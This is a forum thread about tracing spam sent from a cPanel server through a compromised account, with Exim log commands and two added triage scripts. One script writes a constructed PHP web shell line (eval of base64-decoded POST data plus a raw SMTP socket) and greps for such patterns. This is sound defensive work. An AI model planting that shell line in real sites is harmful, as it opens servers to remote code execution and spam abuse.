Spam emails being sent from my dedicated server
Hello All,
I have a dedicated server with many accounts on it. I'm receiving spam emails from this server. The emails are sent from the dedicated server's main IP address using an account hosted on this server. They are sent to my personal email, which is on a separate domain hosted elsewhere. There are around 10-20 emails being sent per day.
I've checked the exim configuration as mentioned on
I couldn't find anything suspicious.
I can't figure out whether there is a malicious script on my dedicated server sending these emails, or whether they are being relayed through my dedicated server's SMTP. How do I find out?
Any tips on how to find the culprit and fix it?
======= Email header. I've modified some of the details for privacy.===============
CrytoUncef
Ieguldiet $1 šodien, lai rīt veiktu $1000. (Latvian: "Invest $1 today to make $1000 tomorrow.")
To: My Name
Envelope-To:
X-Antiabuse: This header was added to track abuse, please include it with any abuse report
X-Antiabuse: Primary Hostname - dedicatedserver.ip-111-111-111.eu
X-Antiabuse: Original Domain - mypersonaldomain.com
X-Antiabuse: Originator/Caller UID/GID - [47 12] / [47 12]
X-Antiabuse: Sender Address Domain - hotmail.com
X-Source-Args:
Return-Path:
Ui-Inboundreport: junk:10;M01:P0:RItwhPGlRLY=;397......
.....
Mime-Version: 1.0
Authentication-Results: kundenserver.de; dkim=pass header.i=@sendingdomain.com
X-Source-Dir:
Content-Transfer-Encoding: quoted-printable
Message-ID: <729dc0f1b4328e45f76e95cd1b4a8b1e@sendingdomain.com>
Dkim-Signature: v=1; a=rsa-sha256; q=dns/txt; c=relaxed/relaxed; d=sendingdomain.com; s=default; h=Content-Transfer-Encoding:Content-Type: MIME-Version:To:From:Subject:Date:Message-ID:Sender:Reply-To:Cc:Content-ID: Content-Description:Resent-Date:Resent-From:Resent-Sender:Resent-To:Resent-Cc :Resent-Message-ID:In-Reply-To:References:List-Id:List-Help:List-Unsubscribe: List-Subscribe:List-Post:List-Owner:List-Archive; bh=RjSCyL9BMDveAcwCExzGtVjZlFMOy0LjmD+n1hmVAwU=; b=iEzWTENLUffBNI69v11zCdP4Af Y07b0tzY+ZY0afZL9uUXK3ZTUxGeTOHeTUAiurE3+ku+aAPt+Nyg3vrJyVeT/tbBvNxwa8NYjSvIi KsPTJMQHE15763kcX4vLNU/W7N6BT9zaDa8Yu1pDDYe4enzScNhGYCgK7khqcgAJfNj8mM7HgG6Nc mfRs7dXZPLgfTMSs+v9BTmKX/vlnwgpngGvnehxznw0C/DqlG410rjZ7yH8Hma3H4eJQDTWBeC95d M1qkZoD5YyY0zCGc+Ryzh4H2jK7F1UdGtaqILHfPNWF36aTgvS5nbRrD1gnwdIHqJo2gghHKbSWm+ FibYaJjA==;
X-Authenticated-Sender: dedicatedserver.ip-111-111-111.eu: indreclv
X-Get-Message-Sender-Via: dedicatedserver.ip-111-111-111.eu: acl_c_authenticated_local_user: indreclv
X-Spam-Flag: YES
Content-Type: text/plain; charset=utf-8
X-Source:
Received: from dedicatedserver.ip-111-111-111.eu ([123.123.123.123]) by mx.kundenserver.de (mxeue012 [212.227.15.41]) with ESMTPS (Nemesis) id 1Mox02-1oxNSl2ZkU-00qUo3 for ; Sat, 14 Jan 2023 16:22:45 +0100
Received: from [::1] (port=46354 helo=sendingdomain.com) by dedicatedserver.ip-111-111-111.eu with esmtp (Exim 4.95) (envelope-from ) id 1pGiMo-0000QE-4A for mypersonalemail@mypersonaldomain.com; Sat, 14 Jan 2023 16:22:45 +0100
Hey there! My first thought, is that our updated docs are all at docs.cpanel.net - the old "documentation.cpanel.net" site is left up for some API calls and legacy applications, but likely shouldn't be referenced for day-to-day use. I like this command - it searches the Exim logs and finds all messages sent from directories. Just be sure to ignore odd directories like /, /etc/csf (if you have that tool installed), and /var/spool/exim: awk '$3 ~ /^cwd/{print $3}' /var/log/exim_mainlog | sort | uniq -c | sed "s|^ *||g" | sort -nr
If the spam is being sent from a user's directory, that should help you track it down, so I'd start there and see what you find! You could also search your Exim log (/var/log/exim_mainlog) directly for the "1Mox02-1oxNSl2ZkU-00qUo3" ID and see if that gives you more details about where it originated from.
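Two details of the posted header decide where to look in the log, and the following script (an added example written for this page, not the cPanel staff's command or cPanel's own tooling) turns them into checks. First, the queue ID that appears in /var/log/exim_mainlog is the one the dedicated server's own Exim assigned in its Received line, 1pGiMo-0000QE-4A; the ID 1Mox02-1oxNSl2ZkU-00qUo3 was assigned by mx.kundenserver.de, the receiving side, so a search for it on the sending server finds nothing. Second, that Received line says the message came in over SMTP from [::1], the server's own loopback, and the X-Authenticated-Sender and X-Get-Message-Sender-Via headers say it was accepted as the authenticated local user indreclv. Exim logs cwd= entries for messages handed to it on the command line (sendmail, PHP mail()); a message accepted over SMTP is logged on its "<=" line with H= (source host) and A= (authenticator and login) fields instead, so the cwd search from the reply needs a companion that groups "<=" lines by A= and source address. The log below is constructed for the example; the host names, IP addresses, the "dovecot_login" authenticator name, the other queue IDs and the second user are assumptions, while indreclv, ::1, the hotmail.com envelope sender, the Message-ID and the queue ID 1pGiMo-0000QE-4A are taken from the posted header.

```shell
#!/bin/sh
# Added example for the thread above: triage helpers for a cPanel-style
# /var/log/exim_mainlog. The sample log is constructed so the script runs
# offline; on a real server pass /var/log/exim_mainlog as the first argument.

SAMPLE=$(mktemp)
trap 'rm -f "$SAMPLE"' EXIT

# Constructed log lines (assumed format; only indreclv, [::1], the hotmail.com
# envelope sender, the Message-ID and queue ID 1pGiMo-0000QE-4A come from the post).
cat > "$SAMPLE" <<'EOF'
2023-01-14 02:10:01 cwd=/home/otheruser/public_html 3 args: /usr/sbin/sendmail -t -i
2023-01-14 02:10:01 1pGVpH-0001aa-Ab <= otheruser@example.com U=otheruser P=local S=812 T="Order confirmation"
2023-01-14 02:10:02 1pGVpH-0001aa-Ab => customer@example.net R=lookuphost T=remote_smtp H=mx.example.net [198.51.100.7]
2023-01-14 02:10:02 1pGVpH-0001aa-Ab Completed
2023-01-14 03:30:00 cwd=/ 3 args: /usr/sbin/sendmail -t -i
2023-01-14 03:30:00 cwd=/var/spool/exim 4 args: /usr/sbin/exim -Mc 1pGWxx-0001bb-Cd
2023-01-14 09:15:10 cwd=/home/otheruser/public_html 3 args: /usr/sbin/sendmail -t -i
2023-01-14 09:15:10 1pGcQa-0002cc-Ef <= otheruser@example.com U=otheruser P=local S=790 T="Order confirmation"
2023-01-14 09:15:11 1pGcQa-0002cc-Ef => customer2@example.net R=lookuphost T=remote_smtp H=mx.example.net [198.51.100.7]
2023-01-14 09:15:11 1pGcQa-0002cc-Ef Completed
2023-01-14 11:02:30 1pGeHz-0003dd-Gh <= otheruser@example.com H=(MacBook.local) [203.0.113.5]:51122 P=esmtpsa A=dovecot_login:otheruser S=1200 T="Re: invoice"
2023-01-14 11:02:31 1pGeHz-0003dd-Gh => someone@example.org R=lookuphost T=remote_smtp H=mx.example.org [198.51.100.9]
2023-01-14 11:02:31 1pGeHz-0003dd-Gh Completed
2023-01-14 12:40:05 1pGfmN-0004ee-Ij <= someone@hotmail.com H=(sendingdomain.com) [::1]:44102 P=esmtpa A=dovecot_login:indreclv S=2148 T="Invest $1 today" for victim1@example.com
2023-01-14 12:40:06 1pGfmN-0004ee-Ij => victim1@example.com R=lookuphost T=remote_smtp H=mx.example.com [198.51.100.10]
2023-01-14 12:40:06 1pGfmN-0004ee-Ij Completed
2023-01-14 16:22:45 1pGiMo-0000QE-4A <= someone@hotmail.com H=(sendingdomain.com) [::1]:46354 P=esmtpa A=dovecot_login:indreclv S=2154 id=729dc0f1b4328e45f76e95cd1b4a8b1e@sendingdomain.com T="Invest $1 today" for mypersonalemail@mypersonaldomain.com
2023-01-14 16:22:45 1pGiMo-0000QE-4A => mypersonalemail@mypersonaldomain.com R=dkim_lookuphost T=dkim_remote_smtp H=mx.kundenserver.de [212.227.15.41]
2023-01-14 16:22:45 1pGiMo-0000QE-4A Completed
EOF

# How far back the log reaches: timestamp of its first line (the head -n 1 check).
log_start() {
    head -n 1 "$1" | cut -d' ' -f1,2
}

# Command-line submissions grouped by working directory (the reply's awk pipeline),
# with the noise directories it mentions filtered out. Catches PHP mail() senders.
cwd_counts() {
    awk '$3 ~ /^cwd=/ {print $3}' "$1" \
    | grep -v -E '^cwd=(/|/etc/csf|/var/spool/exim)$' \
    | sort | uniq -c | sed 's/^ *//' | sort -nr
}

# SMTP submissions that used SMTP AUTH, grouped by login and source address.
# This is the path the posted header shows ([::1], authenticated as indreclv).
auth_senders() {
    awk '$4 == "<=" {
        a = ""; h = ""
        for (i = 5; i <= NF; i++) {
            if ($i ~ /^A=/) a = $i          # authenticator:login
            if ($i ~ /^\[/) h = $i          # [address]:port of the client
        }
        sub(/:[0-9]+$/, "", h)              # drop the ephemeral port
        if (a != "") print a, h
    }' "$1" | sort | uniq -c | sed 's/^ *//' | sort -nr
}

# Every log line for one token: a local queue ID or a Message-ID taken from a header.
trace_message() {
    grep -F -e "$2" "$1"
}

echo "== log starts at: $(log_start "$SAMPLE")"
echo "== command-line submissions by directory:"; cwd_counts "$SAMPLE"
echo "== SMTP AUTH submissions by login and source:"; auth_senders "$SAMPLE"
echo "== trace of 1pGiMo-0000QE-4A:"; trace_message "$SAMPLE" 1pGiMo-0000QE-4A
```

On the sample, cwd_counts shows only the legitimate form in /home/otheruser/public_html, which is the "doesn't show many emails" result, while auth_senders shows two messages accepted from [::1] as indreclv, and trace_message on the queue ID from the Received header lists the acceptance, delivery and completion lines. On the real server, run the same functions against /var/log/exim_mainlog and any rotated copies; a login that appears from the loopback address or from many unrelated client addresses is the account whose credentials are being used, and the "<=" line for it gives the exact time to correlate with the account's web access logs.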
Hello, thanks for the reply. I ran the command and it doesn't seem to show many emails. Sorry, for some reason I can't paste the command here, so I'm attaching it. The exim_log search gives no result.
We may not be looking for "many" emails if you're only seeing 10-20 per day. This would only show the messages sent since the last time the Exim log was rotated - you could find how far back the log goes by running this command: head -n 1 /var/log/exim_mainlog
as that would show the first entry in the log. I would check out some of those /web directories to see if that could be the issue.
Didn't help much. What should I check for in these /home directories?
So that is letting you know that you're only getting the last day of logs. I can't say what specifically could be in the home directories, as it could be anything - it only takes one malicious file or misconfigured web form to cause spam to be sent.
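A first pass over the home directories, as an added example (not part of the thread and not a cPanel tool): it flags the two things the last reply names, a planted mailer file and a misconfigured form, using three independent signals, PHP files that contain the calls a mailer or web shell needs (eval, base64_decode, gzinflate, fsockopen, or mail() with a recipient taken straight from the request), PHP files modified recently, and world-writable directories where uploaded files usually land. The directory tree, the two PHP files and the user names in it are constructed for the example; run the functions against /home on the server.

```shell
#!/bin/sh
# Added example for the thread above: hunt for a mailer script or an open
# contact form under the account home directories. The tree is constructed
# so the script runs offline; on a real server call the functions with /home.

ROOT=$(mktemp -d)
trap 'rm -rf "$ROOT"' EXIT

mkdir -p "$ROOT/indreclv/public_html/wp-content/uploads" "$ROOT/otheruser/public_html"

# Constructed "misconfigured web form": the recipient comes from the request,
# so anyone can post to it and have the server mail anybody.
cat > "$ROOT/otheruser/public_html/contact.php" <<'EOF'
<?php
mail($_POST['to'], $_POST['subject'], $_POST['message']);
EOF
touch -t 202201010000 "$ROOT/otheruser/public_html/contact.php"   # old file

# Constructed "malicious file": obfuscated payload plus a raw SMTP socket,
# dropped into a world-writable uploads directory recently.
cat > "$ROOT/indreclv/public_html/wp-content/uploads/cache.php" <<'EOF'
<?php
eval(base64_decode($_POST['c']));
$s = fsockopen('127.0.0.1', 25);
EOF
chmod 777 "$ROOT/indreclv/public_html/wp-content/uploads"

# PHP files containing the usual building blocks of mailers and web shells.
mailer_candidates() {
    find "$1" -type f -name '*.php' -print0 \
    | xargs -0 grep -l -E 'eval\(|base64_decode\(|gzinflate\(|fsockopen\(|mail\( *\$_(GET|POST|REQUEST)' \
    | sort
}

# PHP files changed within the last N days.
recent_php() {
    find "$1" -type f -name '*.php' -mtime "-$2" | sort
}

# Directories anyone on the box can write to: the usual landing spot for uploads.
writable_dirs() {
    find "$1" -type d -perm -0002 | sort
}

echo "== PHP files with mailer/shell patterns:"; mailer_candidates "$ROOT"
echo "== PHP files changed in the last 7 days:"; recent_php "$ROOT" 7
echo "== world-writable directories:"; writable_dirs "$ROOT"
```

A file that shows up in more than one list (recently modified, in a writable upload directory, containing eval or a socket call) is the one to read first; a form that appears only in the first list, like contact.php here, is the "misconfigured web form" case and needs its recipient fixed rather than deleting the file. Whatever is found, the posted header shows the mail was accepted with SMTP AUTH as indreclv, so that account's mail password should be changed as well, otherwise the sender can keep submitting from anywhere after the script is gone.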